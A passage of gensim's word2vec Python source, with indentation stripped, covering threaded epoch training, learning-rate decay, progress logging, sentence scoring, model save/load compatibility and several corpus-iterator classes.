trained_word_count_epoch, raw_word_count_epoch, job_tally_epoch = self._train_epoch(
corpus_iterable, cur_epoch=cur_epoch, total_examples=total_examples,
total_words=total_words, queue_factor=queue_factor, report_delay=report_delay,
callbacks=callbacks, **kwargs)
else:
trained_word_count_epoch, raw_word_count_epoch, job_tally_epoch = self._train_epoch_corpusfile(
corpus_file, cur_epoch=cur_epoch, total_examples=total_examples, total_words=total_words,
callbacks=callbacks, **kwargs)
trained_word_count += trained_word_count_epoch
raw_word_count += raw_word_count_epoch
job_tally += job_tally_epoch
for callback in callbacks:
callback.on_epoch_end(self)
# Log overall time
total_elapsed = default_timer() - start
self._log_train_end(raw_word_count, trained_word_count, total_elapsed, job_tally)
self.train_count += 1 # number of times train() has been called
self._clear_post_train()
for callback in callbacks:
callback.on_train_end(self)
return trained_word_count, raw_word_count
def _worker_loop_corpusfile(
self, corpus_file, thread_id, offset, cython_vocab, progress_queue, cur_epoch=0,
total_examples=None, total_words=None, **kwargs,
):
"""Train the model on a `corpus_file` in LineSentence format.
This function will be called in parallel by multiple workers (threads or processes) to make
optimal use of multicore machines.
Parameters
----------
corpus_file : str
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
thread_id : int
Thread index starting from 0 to `number of workers - 1`.
offset : int
Offset (in bytes) in the `corpus_file` for particular worker.
cython_vocab : :class:`~gensim.models.word2vec_inner.CythonVocab`
Copy of the vocabulary in order to access it without GIL.
progress_queue : Queue of (int, int, int)
A queue of progress reports. Each report is represented as a tuple of these 3 elements:
* Size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
**kwargs : object
Additional key word parameters for the specific model inheriting from this class.
"""
thread_private_mem = self._get_thread_working_mem()
examples, tally, raw_tally = self._do_train_epoch(
corpus_file, thread_id, offset, cython_vocab, thread_private_mem, cur_epoch,
total_examples=total_examples, total_words=total_words, **kwargs)
progress_queue.put((examples, tally, raw_tally))
progress_queue.put(None)
def _worker_loop(self, job_queue, progress_queue):
"""Train the model, lifting batches of data from the queue.
This function will be called in parallel by multiple workers (threads or processes) to make
optimal use of multicore machines.
Parameters
----------
job_queue : Queue of (list of objects, float)
A queue of jobs still to be processed. The worker will take up jobs from this queue.
Each job is represented by a tuple where the first element is the corpus chunk to be processed and
the second is the floating-point learning rate.
progress_queue : Queue of (int, int, int)
A queue of progress reports. Each report is represented as a tuple of these 3 elements:
* Size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
"""
thread_private_mem = self._get_thread_working_mem()
jobs_processed = 0
while True:
job = job_queue.get()
if job is None:
progress_queue.put(None)
break # no more jobs => quit this worker
data_iterable, alpha = job
tally, raw_tally = self._do_train_job(data_iterable, alpha, thread_private_mem)
progress_queue.put((len(data_iterable), tally, raw_tally)) # report back progress
jobs_processed += 1
logger.debug("worker exiting, processed %i jobs", jobs_processed)
def _job_producer(self, data_iterator, job_queue, cur_epoch=0, total_examples=None, total_words=None):
"""Fill the jobs queue using the data found in the input stream.
Each job is represented by a tuple where the first element is the corpus chunk to be processed and
the second is a dictionary of parameters.
Parameters
----------
data_iterator : iterable of list of objects
The input dataset. This will be split in chunks and these chunks will be pushed to the queue.
job_queue : Queue of (list of object, float)
A queue of jobs still to be processed. The worker will take up jobs from this queue.
Each job is represented by a tuple where the first element is the corpus chunk to be processed and
the second is the floating-point learning rate.
cur_epoch : int, optional
The current training epoch, needed to compute the training parameters for each job.
For example in many implementations the learning rate would be dropping with the number of epochs.
total_examples : int, optional
Count of objects in the `data_iterator`. In the usual case this would correspond to the number of sentences
in a corpus. Used to log progress.
total_words : int, optional
Count of total objects in `data_iterator`. In the usual case this would correspond to the number of raw
words in a corpus. Used to log progress.
"""
job_batch, batch_size = [], 0
pushed_words, pushed_examples = 0, 0
next_alpha = self._get_next_alpha(0.0, cur_epoch)
job_no = 0
for data_idx, data in enumerate(data_iterator):
data_length = self._raw_word_count([data])
# can we fit this sentence into the existing job batch?
if batch_size + data_length <= self.batch_words:
# yes => add it to the current job
job_batch.append(data)
batch_size += data_length
else:
job_no += 1
job_queue.put((job_batch, next_alpha))
# update the learning rate for the next job
if total_examples:
# examples-based decay
pushed_examples += len(job_batch)
epoch_progress = 1.0 * pushed_examples / total_examples
else:
# words-based decay
pushed_words += self._raw_word_count(job_batch)
epoch_progress = 1.0 * pushed_words / total_words
next_alpha = self._get_next_alpha(epoch_progress, cur_epoch)
# add the sentence that didn't fit as the first item of a new job
job_batch, batch_size = [data], data_length
# add the last job too (may be significantly smaller than batch_words)
if job_batch:
job_no += 1
job_queue.put((job_batch, next_alpha))
if job_no == 0 and self.train_count == 0:
logger.warning(
"train() called with an empty iterator (if not intended, "
"be sure to provide a corpus that offers restartable iteration = an iterable)."
)
# give the workers heads up that they can finish -- no more work!
for _ in range(self.workers):
job_queue.put(None)
logger.debug("job loop exiting, total %i jobs", job_no)
def _log_epoch_progress(
self, progress_queue=None, job_queue=None, cur_epoch=0, total_examples=None,
total_words=None, report_delay=1.0, is_corpus_file_mode=None,
):
"""Get the progress report for a single training epoch.
Parameters
----------
progress_queue : Queue of (int, int, int)
A queue of progress reports. Each report is represented as a tuple of these 3 elements:
* size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
job_queue : Queue of (list of object, float)
A queue of jobs still to be processed. The worker will take up jobs from this queue.
Each job is represented by a tuple where the first element is the corpus chunk to be processed and
the second is the floating-point learning rate.
cur_epoch : int, optional
The current training epoch, needed to compute the training parameters for each job.
For example in many implementations the learning rate would be dropping with the number of epochs.
total_examples : int, optional
Count of objects in the `data_iterator`. In the usual case this would correspond to the number of sentences
in a corpus. Used to log progress.
total_words : int, optional
Count of total objects in `data_iterator`. In the usual case this would correspond to the number of raw
words in a corpus. Used to log progress.
report_delay : float, optional
Number of seconds between two consecutive progress report messages in the logger.
is_corpus_file_mode : bool, optional
Whether training is file-based (corpus_file argument) or not.
Returns
-------
(int, int, int)
The epoch report consisting of three elements:
* size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
"""
example_count, trained_word_count, raw_word_count = 0, 0, 0
start, next_report = default_timer() - 0.00001, 1.0
job_tally = 0
unfinished_worker_count = self.workers
while unfinished_worker_count > 0:
report = progress_queue.get() # blocks if workers too slow
if report is None: # a thread reporting that it finished
unfinished_worker_count -= 1
logger.info("worker thread finished; awaiting finish of %i more threads", unfinished_worker_count)
continue
examples, trained_words, raw_words = report
job_tally += 1
# update progress stats
example_count += examples
trained_word_count += trained_words # only words in vocab & sampled
raw_word_count += raw_words
# log progress once every report_delay seconds
elapsed = default_timer() - start
if elapsed >= next_report:
self._log_progress(
job_queue, progress_queue, cur_epoch, example_count, total_examples,
raw_word_count, total_words, trained_word_count, elapsed)
next_report = elapsed + report_delay
# all done; report the final stats
elapsed = default_timer() - start
self._log_epoch_end(
cur_epoch, example_count, total_examples, raw_word_count, total_words,
trained_word_count, elapsed, is_corpus_file_mode)
self.total_train_time += elapsed
return trained_word_count, raw_word_count, job_tally
def _train_epoch_corpusfile(
self, corpus_file, cur_epoch=0, total_examples=None, total_words=None, callbacks=(), **kwargs,
):
"""Train the model for a single epoch.
Parameters
----------
corpus_file : str
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
cur_epoch : int, optional
The current training epoch, needed to compute the training parameters for each job.
For example in many implementations the learning rate would be dropping with the number of epochs.
total_examples : int, optional
Count of objects in the `data_iterator`. In the usual case this would correspond to the number of sentences
in a corpus, used to log progress.
total_words : int
Count of total objects in `data_iterator`. In the usual case this would correspond to the number of raw
words in a corpus, used to log progress. Must be provided in order to seek in `corpus_file`.
**kwargs : object
Additional key word parameters for the specific model inheriting from this class.
Returns
-------
(int, int, int)
The training report for this epoch consisting of three elements:
* Size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
"""
if not total_words:
raise ValueError("total_words must be provided alongside corpus_file argument.")
from gensim.models.word2vec_corpusfile import CythonVocab
from gensim.models.fasttext import FastText
cython_vocab = CythonVocab(self.wv, hs=self.hs, fasttext=isinstance(self, FastText))
progress_queue = Queue()
corpus_file_size = os.path.getsize(corpus_file)
thread_kwargs = copy.copy(kwargs)
thread_kwargs['cur_epoch'] = cur_epoch
thread_kwargs['total_examples'] = total_examples
thread_kwargs['total_words'] = total_words
workers = [
threading.Thread(
target=self._worker_loop_corpusfile,
args=(
corpus_file, thread_id, corpus_file_size / self.workers * thread_id, cython_vocab, progress_queue
),
kwargs=thread_kwargs
) for thread_id in range(self.workers)
]
for thread in workers:
thread.daemon = True
thread.start()
trained_word_count, raw_word_count, job_tally = self._log_epoch_progress(
progress_queue=progress_queue, job_queue=None, cur_epoch=cur_epoch,
total_examples=total_examples, total_words=total_words, is_corpus_file_mode=True)
return trained_word_count, raw_word_count, job_tally
def _train_epoch(
self, data_iterable, cur_epoch=0, total_examples=None, total_words=None,
queue_factor=2, report_delay=1.0, callbacks=(),
):
"""Train the model for a single epoch.
Parameters
----------
data_iterable : iterable of list of object
The input corpus. This will be split in chunks and these chunks will be pushed to the queue.
cur_epoch : int, optional
The current training epoch, needed to compute the training parameters for each job.
For example in many implementations the learning rate would be dropping with the number of epochs.
total_examples : int, optional
Count of objects in the `data_iterator`. In the usual case this would correspond to the number of sentences
in a corpus, used to log progress.
total_words : int, optional
Count of total objects in `data_iterator`. In the usual case this would correspond to the number of raw
words in a corpus, used to log progress.
queue_factor : int, optional
Multiplier for size of queue -> size = number of workers * queue_factor.
report_delay : float, optional
Number of seconds between two consecutive progress report messages in the logger.
Returns
-------
(int, int, int)
The training report for this epoch consisting of three elements:
* Size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
"""
job_queue = Queue(maxsize=queue_factor * self.workers)
progress_queue = Queue(maxsize=(queue_factor + 1) * self.workers)
workers = [
threading.Thread(
target=self._worker_loop,
args=(job_queue, progress_queue,))
for _ in range(self.workers)
]
workers.append(threading.Thread(
target=self._job_producer,
args=(data_iterable, job_queue),
kwargs={'cur_epoch': cur_epoch, 'total_examples': total_examples, 'total_words': total_words}))
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
trained_word_count, raw_word_count, job_tally = self._log_epoch_progress(
progress_queue, job_queue, cur_epoch=cur_epoch, total_examples=total_examples,
total_words=total_words, report_delay=report_delay, is_corpus_file_mode=False,
)
return trained_word_count, raw_word_count, job_tally
def _get_next_alpha(self, epoch_progress, cur_epoch):
"""Get the correct learning rate for the next iteration.
Parameters
----------
epoch_progress : float
Ratio of finished work in the current epoch.
cur_epoch : int
Number of current iteration.
Returns
-------
float
The learning rate to be used in the next training epoch.
"""
start_alpha = self.alpha
end_alpha = self.min_alpha
progress = (cur_epoch + epoch_progress) / self.epochs
next_alpha = start_alpha - (start_alpha - end_alpha) * progress
next_alpha = max(end_alpha, next_alpha)
self.min_alpha_yet_reached = next_alpha
return next_alpha
def _get_thread_working_mem(self):
"""Computes the memory used per worker thread.
Returns
-------
(np.ndarray, np.ndarray)
Each worker threads private work memory.
"""
work = matutils.zeros_aligned(self.layer1_size, dtype=REAL) # per-thread private work memory
neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL)
return work, neu1
def _raw_word_count(self, job):
"""Get the number of words in a given job.
Parameters
----------
job: iterable of list of str
The corpus chunk processed in a single batch.
Returns
-------
int
Number of raw words in the corpus chunk.
"""
return sum(len(sentence) for sentence in job)
def _check_corpus_sanity(self, corpus_iterable=None, corpus_file=None, passes=1):
"""Checks whether the corpus parameters make sense."""
if corpus_file is None and corpus_iterable is None:
raise TypeError("Either one of corpus_file or corpus_iterable value must be provided")
if corpus_file is not None and corpus_iterable is not None:
raise TypeError("Both corpus_file and corpus_iterable must not be provided at the same time")
if corpus_iterable is None and not os.path.isfile(corpus_file):
raise TypeError("Parameter corpus_file must be a valid path to a file, got %r instead" % corpus_file)
if corpus_iterable is not None and not isinstance(corpus_iterable, Iterable):
raise TypeError(
"The corpus_iterable must be an iterable of lists of strings, got %r instead" % corpus_iterable)
if corpus_iterable is not None and isinstance(corpus_iterable, GeneratorType) and passes > 1:
raise TypeError(
f"Using a generator as corpus_iterable can't support {passes} passes. Try a re-iterable sequence.")
def _check_training_sanity(self, epochs=0, total_examples=None, total_words=None, **kwargs):
"""Checks whether the training parameters make sense.
Parameters
----------
epochs : int
Number of training epochs. A positive integer.
total_examples : int, optional
Number of documents in the corpus. Either `total_examples` or `total_words` **must** be supplied.
total_words : int, optional
Number of words in the corpus. Either `total_examples` or `total_words` **must** be supplied.
**kwargs : object
Unused. Present to preserve signature among base and inherited implementations.
Raises
------
RuntimeError
If one of the required training pre/post processing steps have not been performed.
ValueError
If the combination of input parameters is inconsistent.
"""
if self.alpha > self.min_alpha_yet_reached:
logger.warning("Effective 'alpha' higher than previous training cycles")
if not self.wv.key_to_index: # should be set by `build_vocab`
raise RuntimeError("you must first build vocabulary before training the model")
if not len(self.wv.vectors):
raise RuntimeError("you must initialize vectors before training the model")
if total_words is None and total_examples is None:
raise ValueError(
"You must specify either total_examples or total_words, for proper learning-rate "
"and progress calculations. "
"If you've just built the vocabulary using the same corpus, using the count cached "
"in the model is sufficient: total_examples=model.corpus_count."
)
if epochs is None or epochs <= 0:
raise ValueError("You must specify an explicit epochs count. The usual value is epochs=model.epochs.")
def _log_progress(
self, job_queue, progress_queue, cur_epoch, example_count, total_examples,
raw_word_count, total_words, trained_word_count, elapsed
):
"""Callback used to log progress for long running jobs.
Parameters
----------
job_queue : Queue of (list of object, float)
The queue of jobs still to be performed by workers. Each job is represented as a tuple containing
the batch of data to be processed and the floating-point learning rate.
progress_queue : Queue of (int, int, int)
A queue of progress reports. Each report is represented as a tuple of these 3 elements:
* size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
cur_epoch : int
The current training iteration through the corpus.
example_count : int
Number of examples (could be sentences for example) processed until now.
total_examples : int
Number of all examples present in the input corpus.
raw_word_count : int
Number of words used in training until now.
total_words : int
Number of all words in the input corpus.
trained_word_count : int
Number of effective words used in training until now (after ignoring unknown words and trimming
the sentence length).
elapsed : int
Elapsed time since the beginning of training in seconds.
Notes
-----
If you train the model via `corpus_file` argument, there is no job_queue, so reported job_queue size will
always be equal to -1.
"""
if total_examples:
# examples-based progress %
logger.info(
"EPOCH %i - PROGRESS: at %.2f%% examples, %.0f words/s, in_qsize %i, out_qsize %i",
cur_epoch + 1, 100.0 * example_count / total_examples, trained_word_count / elapsed,
-1 if job_queue is None else utils.qsize(job_queue), utils.qsize(progress_queue)
)
else:
# words-based progress %
logger.info(
"EPOCH %i - PROGRESS: at %.2f%% words, %.0f words/s, in_qsize %i, out_qsize %i",
cur_epoch + 1, 100.0 * raw_word_count / total_words, trained_word_count / elapsed,
-1 if job_queue is None else utils.qsize(job_queue), utils.qsize(progress_queue)
)
def _log_epoch_end(
self, cur_epoch, example_count, total_examples, raw_word_count, total_words,
trained_word_count, elapsed, is_corpus_file_mode
):
"""Callback used to log the end of a training epoch.
Parameters
----------
cur_epoch : int
The current training iteration through the corpus.
example_count : int
Number of examples (could be sentences for example) processed until now.
total_examples : int
Number of all examples present in the input corpus.
raw_word_count : int
Number of words used in training until now.
total_words : int
Number of all words in the input corpus.
trained_word_count : int
Number of effective words used in training until now (after ignoring unknown words and trimming
the sentence length).
elapsed : int
Elapsed time since the beginning of training in seconds.
is_corpus_file_mode : bool
Whether training is file-based (corpus_file argument) or not.
Warnings
--------
In case the corpus is changed while the epoch was running.
"""
logger.info(
"EPOCH - %i : training on %i raw words (%i effective words) took %.1fs, %.0f effective words/s",
cur_epoch + 1, raw_word_count, trained_word_count, elapsed, trained_word_count / elapsed,
)
# don't warn if training in file-based mode, because it's expected behavior
if is_corpus_file_mode:
return
# check that the input corpus hasn't changed during iteration
if total_examples and total_examples != example_count:
logger.warning(
"EPOCH - %i : supplied example count (%i) did not equal expected count (%i)", cur_epoch + 1,
example_count, total_examples
)
if total_words and total_words != raw_word_count:
logger.warning(
"EPOCH - %i : supplied raw word count (%i) did not equal expected count (%i)", cur_epoch + 1,
raw_word_count, total_words
)
def _log_train_end(self, raw_word_count, trained_word_count, total_elapsed, job_tally):
"""Callback to log the end of training.
Parameters
----------
raw_word_count : int
Number of words used in the whole training.
trained_word_count : int
Number of effective words used in training (after ignoring unknown words and trimming the sentence length).
total_elapsed : int
Total time spent during training in seconds.
job_tally : int
Total number of jobs processed during training.
"""
self.add_lifecycle_event("train", msg=(
f"training on {raw_word_count} raw words ({trained_word_count} effective words) "
f"took {total_elapsed:.1f}s, {trained_word_count / total_elapsed:.0f} effective words/s"
))
def score(self, sentences, total_sentences=int(1e6), chunksize=100, queue_factor=2, report_delay=1):
"""Score the log probability for a sequence of sentences.
This does not change the fitted model in any way (see :meth:`~gensim.models.word2vec.Word2Vec.train` for that).
Gensim has currently only implemented score for the hierarchical softmax scheme,
so you need to have run word2vec with `hs=1` and `negative=0` for this to work.
Note that you should specify `total_sentences`; you'll run into problems if you ask to
score more than this number of sentences but it is inefficient to set the value too high.
See the `article by Matt Taddy: "Document Classification by Inversion of Distributed Language Representations"
<https://arxiv.org/pdf/1504.07295.pdf>`_ and the
`gensim demo <https://github.com/piskvorky/gensim/blob/develop/docs/notebooks/deepir.ipynb>`_ for examples of
how to use such scores in document classification.
Parameters
----------
sentences : iterable of list of str
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
total_sentences : int, optional
Count of sentences.
chunksize : int, optional
Chunksize of jobs
queue_factor : int, optional
Multiplier for size of queue (number of workers * queue_factor).
report_delay : float, optional
Seconds to wait before reporting progress.
"""
logger.info(
"scoring sentences with %i workers on %i vocabulary and %i features, "
"using sg=%s hs=%s sample=%s and negative=%s",
self.workers, len(self.wv), self.layer1_size, self.sg, self.hs,
self.sample, self.negative
)
if not self.wv.key_to_index:
raise RuntimeError("you must first build vocabulary before scoring new data")
if not self.hs:
raise RuntimeError(
"We have currently only implemented score for the hierarchical softmax scheme, "
"so you need to have run word2vec with hs=1 and negative=0 for this to work."
)
def worker_loop():
"""Compute log probability for each sentence, lifting lists of sentences from the jobs queue."""
work = np.zeros(1, dtype=REAL) # for sg hs, we actually only need one memory loc (running sum)
neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL)
while True:
job = job_queue.get()
if job is None: # signal to finish
break
ns = 0
for sentence_id, sentence in job:
if sentence_id >= total_sentences:
break
if self.sg:
score = score_sentence_sg(self, sentence, work)
else:
score = score_sentence_cbow(self, sentence, work, neu1)
sentence_scores[sentence_id] = score
ns += 1
progress_queue.put(ns) # report progress
start, next_report = default_timer(), 1.0
# buffer ahead only a limited number of jobs.. this is the reason we can't simply use ThreadPool :(
job_queue = Queue(maxsize=queue_factor * self.workers)
progress_queue = Queue(maxsize=(queue_factor + 1) * self.workers)
workers = [threading.Thread(target=worker_loop) for _ in range(self.workers)]
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
sentence_count = 0
sentence_scores = matutils.zeros_aligned(total_sentences, dtype=REAL)
push_done = False
done_jobs = 0
jobs_source = enumerate(utils.grouper(enumerate(sentences), chunksize))
# fill jobs queue with (id, sentence) job items
while True:
try:
job_no, items = next(jobs_source)
if (job_no - 1) * chunksize > total_sentences:
logger.warning(
"terminating after %i sentences (set higher total_sentences if you want more).",
total_sentences
)
job_no -= 1
raise StopIteration()
logger.debug("putting job #%i in the queue", job_no)
job_queue.put(items)
except StopIteration:
logger.info("reached end of input; waiting to finish %i outstanding jobs", job_no - done_jobs + 1)
for _ in range(self.workers):
job_queue.put(None) # give the workers heads up that they can finish -- no more work!
push_done = True
try:
while done_jobs < (job_no + 1) or not push_done:
ns = progress_queue.get(push_done) # only block after all jobs pushed
sentence_count += ns
done_jobs += 1
elapsed = default_timer() - start
if elapsed >= next_report:
logger.info(
"PROGRESS: at %.2f%% sentences, %.0f sentences/s",
100.0 * sentence_count, sentence_count / elapsed
)
next_report = elapsed + report_delay # don't flood log, wait report_delay seconds
else:
# loop ended by job count; really done
break
except Empty:
pass # already out of loop; continue to next push
elapsed = default_timer() - start
self.wv.norms = None # clear any cached lengths
logger.info(
"scoring %i sentences took %.1fs, %.0f sentences/s",
sentence_count, elapsed, sentence_count / elapsed
)
return sentence_scores[:sentence_count]
def predict_output_word(self, context_words_list, topn=10):
"""Get the probability distribution of the center word given context words.
Note this performs a CBOW-style propagation, even in SG models,
and doesn't quite weight the surrounding words the same as in
training -- so it's just one crude way of using a trained model
as a predictor.
Parameters
----------
context_words_list : list of str
List of context words.
topn : int, optional
Return `topn` words and their probabilities.
Returns
-------
list of (str, float)
`topn` length list of tuples of (word, probability).
"""
if not self.negative:
raise RuntimeError(
"We have currently only implemented predict_output_word for the negative sampling scheme, "
"so you need to have run word2vec with negative > 0 for this to work."
)
if not hasattr(self.wv, 'vectors') or not hasattr(self, 'syn1neg'):
raise RuntimeError("Parameters required for predicting the output words not found.")
word2_indices = [self.wv.get_index(w) for w in context_words_list if w in self.wv]
if not word2_indices:
logger.warning("All the input context words are out-of-vocabulary for the current model.")
return None
l1 = np.sum(self.wv.vectors[word2_indices], axis=0)
if word2_indices and self.cbow_mean:
l1 /= len(word2_indices)
# propagate hidden -> output and take softmax to get probabilities
prob_values = np.exp(np.dot(l1, self.syn1neg.T))
prob_values /= sum(prob_values)
top_indices = matutils.argsort(prob_values, topn=topn, reverse=True)
# returning the most probable output words with their probabilities
return [(self.wv.index_to_key[index1], prob_values[index1]) for index1 in top_indices]
def reset_from(self, other_model):
"""Borrow shareable pre-built structures from `other_model` and reset hidden layer weights.
Structures copied are:
* Vocabulary
* Index to word mapping
* Cumulative frequency table (used for negative sampling)
* Cached corpus length
Useful when testing multiple models on the same corpus in parallel. However, as the models
then share all vocabulary-related structures other than vectors, neither should then
expand their vocabulary (which could leave the other in an inconsistent, broken state).
And, any changes to any per-word 'vecattr' will affect both models.
Parameters
----------
other_model : :class:`~gensim.models.word2vec.Word2Vec`
Another model to copy the internal structures from.
"""
self.wv = KeyedVectors(self.vector_size)
self.wv.index_to_key = other_model.wv.index_to_key
self.wv.key_to_index = other_model.wv.key_to_index
self.wv.expandos = other_model.wv.expandos
self.cum_table = other_model.cum_table
self.corpus_count = other_model.corpus_count
self.init_weights()
def __str__(self):
"""Human readable representation of the model's state.
Returns
-------
str
Human readable representation of the model's state, including the vocabulary size, vector size
and learning rate.
"""
return "%s(vocab=%s, vector_size=%s, alpha=%s)" % (
self.__class__.__name__, len(self.wv.index_to_key), self.wv.vector_size, self.alpha,
)
def save(self, *args, **kwargs):
"""Save the model.
This saved model can be loaded again using :func:`~gensim.models.word2vec.Word2Vec.load`, which supports
online training and getting vectors for vocabulary words.
Parameters
----------
fname : str
Path to the file.
"""
super(Word2Vec, self).save(*args, **kwargs)
def _save_specials(self, fname, separately, sep_limit, ignore, pickle_protocol, compress, subname):
"""Arrange any special handling for the `gensim.utils.SaveLoad` protocol."""
# don't save properties that are merely calculated from others
ignore = set(ignore).union(['cum_table', ])
return super(Word2Vec, self)._save_specials(
fname, separately, sep_limit, ignore, pickle_protocol, compress, subname)
@classmethod
def load(cls, *args, rethrow=False, **kwargs):
"""Load a previously saved :class:`~gensim.models.word2vec.Word2Vec` model.
See Also
--------
:meth:`~gensim.models.word2vec.Word2Vec.save`
Save model.
Parameters
----------
fname : str
Path to the saved file.
Returns
-------
:class:`~gensim.models.word2vec.Word2Vec`
Loaded model.
"""
try:
model = super(Word2Vec, cls).load(*args, **kwargs)
if not isinstance(model, Word2Vec):
rethrow = True
raise AttributeError("Model of type %s can't be loaded by %s" % (type(model), str(cls)))
return model
except AttributeError as ae:
if rethrow:
raise ae
logger.error(
"Model load error. Was model saved using code from an older Gensim Version? "
"Try loading older model using gensim-3.8.3, then re-saving, to restore "
"compatibility with current code.")
raise ae
def _load_specials(self, *args, **kwargs):
"""Handle special requirements of `.load()` protocol, usually up-converting older versions."""
super(Word2Vec, self)._load_specials(*args, **kwargs)
# for backward compatibility, add/rearrange properties from prior versions
if not hasattr(self, 'ns_exponent'):
self.ns_exponent = 0.75
if self.negative and hasattr(self.wv, 'index_to_key'):
self.make_cum_table() # rebuild cum_table from vocabulary
if not hasattr(self, 'corpus_count'):
self.corpus_count = None
if not hasattr(self, 'corpus_total_words'):
self.corpus_total_words = None
if not hasattr(self.wv, 'vectors_lockf') and hasattr(self.wv, 'vectors'):
self.wv.vectors_lockf = np.ones(1, dtype=REAL)
if not hasattr(self, 'random'):
# use new instance of numpy's recommended generator/algorithm
self.random = np.random.default_rng(seed=self.seed)
if not hasattr(self, 'train_count'):
self.train_count = 0
self.total_train_time = 0
if not hasattr(self, 'epochs'):
self.epochs = self.iter
del self.iter
if not hasattr(self, 'max_final_vocab'):
self.max_final_vocab = None
if hasattr(self, 'vocabulary'): # re-integrate state that had been moved
for a in ('max_vocab_size', 'min_count', 'sample', 'sorted_vocab', 'null_word', 'raw_vocab'):
setattr(self, a, getattr(self.vocabulary, a))
del self.vocabulary
if hasattr(self, 'trainables'): # re-integrate state that had been moved
for a in ('hashfxn', 'layer1_size', 'seed', 'syn1neg', 'syn1'):
if hasattr(self.trainables, a):
setattr(self, a, getattr(self.trainables, a))
if hasattr(self, 'syn1'):
self.syn1 = self.syn1
del self.syn1
del self.trainables
def get_latest_training_loss(self):
"""Get current value of the training loss.
Returns
-------
float
Current training loss.
"""
return self.running_training_loss
class BrownCorpus:
def __init__(self, dirname):
"""Iterate over sentences from the `Brown corpus <https://en.wikipedia.org/wiki/Brown_Corpus>`_
(part of `NLTK data <https://www.nltk.org/data.html>`_).
"""
self.dirname = dirname
def __iter__(self):
for fname in os.listdir(self.dirname):
fname = os.path.join(self.dirname, fname)
if not os.path.isfile(fname):
continue
with utils.open(fname, 'rb') as fin:
for line in fin:
line = utils.to_unicode(line)
# each file line is a single sentence in the Brown corpus
# each token is WORD/POS_TAG
token_tags = [t.split('/') for t in line.split() if len(t.split('/')) == 2]
# ignore words with non-alphabetic tags like ",", "!" etc (punctuation, weird stuff)
words = ["%s/%s" % (token.lower(), tag[:2]) for token, tag in token_tags if tag[:2].isalpha()]
if not words: # don't bother sending out empty sentences
continue
yield words
class Text8Corpus:
def __init__(self, fname, max_sentence_length=MAX_WORDS_IN_BATCH):
"""Iterate over sentences from the "text8" corpus, unzipped from http://mattmahoney.net/dc/text8.zip."""
self.fname = fname
self.max_sentence_length = max_sentence_length
def __iter__(self):
# the entire corpus is one gigantic line -- there are no sentence marks at all
# so just split the sequence of tokens arbitrarily: 1 sentence = 1000 tokens
sentence, rest = [], b''
with utils.open(self.fname, 'rb') as fin:
while True:
text = rest + fin.read(8192) # avoid loading the entire file (=1 line) into RAM
if text == rest: # EOF
words = utils.to_unicode(text).split()
sentence.extend(words) # return the last chunk of words, too (may be shorter/longer)
if sentence:
yield sentence
break
last_token = text.rfind(b' ') # last token may have been split in two... keep for next iteration
words, rest = (utils.to_unicode(text[:last_token]).split(),
text[last_token:].strip()) if last_token >= 0 else ([], text)
sentence.extend(words)
while len(sentence) >= self.max_sentence_length:
yield sentence[:self.max_sentence_length]
sentence = sentence[self.max_sentence_length:]
class LineSentence:
def __init__(self, source, max_sentence_length=MAX_WORDS_IN_BATCH, limit=None):
"""Iterate over a file that contains sentences: one line = one sentence.
Words must be already preprocessed and separated by whitespace.
Parameters
----------
source : string or a file-like object
Path to the file on disk, or an already-open file object (must support `seek(0)`).
limit : int or None
Clip the file to the first `limit` lines. Do no clipping if `limit is None` (the default).
Examples
--------
.. sourcecode:: pycon
>>> from gensim.test.utils import datapath
>>> sentences = LineSentence(datapath('lee_background.cor'))
>>> for sentence in sentences:
... pass
"""
self.source = source
self.max_sentence_length = max_sentence_length
self.limit = limit
def __iter__(self):
"""Iterate through the lines in the source."""
try:
# Assume it is a file-like object and try treating it as such
# Things that don't have seek will trigger an exception
self.source.seek(0)
for line in itertools.islice(self.source, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i: i + self.max_sentence_length]
i += self.max_sentence_length
except AttributeError:
# If it didn't work like a file, use it as a string filename
with utils.open(self.source, 'rb') as fin:
for line in itertools.islice(fin, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i: i + self.max_sentence_length]
i += self.max_sentence_length
class PathLineSentences:
def __init__(self, source, max_sentence_length=MAX_WORDS_IN_BATCH, limit=None):
"""Like :class:`~gensim.models.word2vec.LineSentence`, but process all files in a directory
in alphabetical order by filename.
The directory must only contain files that can be read by :class:`gensim.models.word2vec.LineSentence`:
.bz2, .gz, and text files. Any file not ending with .bz2 or .gz is assumed to be a text file.
The format of files (either text, or compressed text files) in the path is one sentence = one line,
with words already preprocessed and separated by whitespace.
Warnings
--------
Does **not recurse** into subdirectories.
Parameters
----------
source : str
Path to the directory.
limit : int or None
Read only the first `limit` lines from each file. Read all if limit is None (the default).
"""
self.source = source
self.max_sentence_length = max_sentence_length
self.limit = limit
if os.path.isfile(self.source):
logger.debug('single file given as source, rather than a directory of files')
logger.debug('consider using models.word2vec.LineSentence for a single file')
self.input_files = [self.source] # force code compatibility with list of files
elif os.path.isdir(self.source):
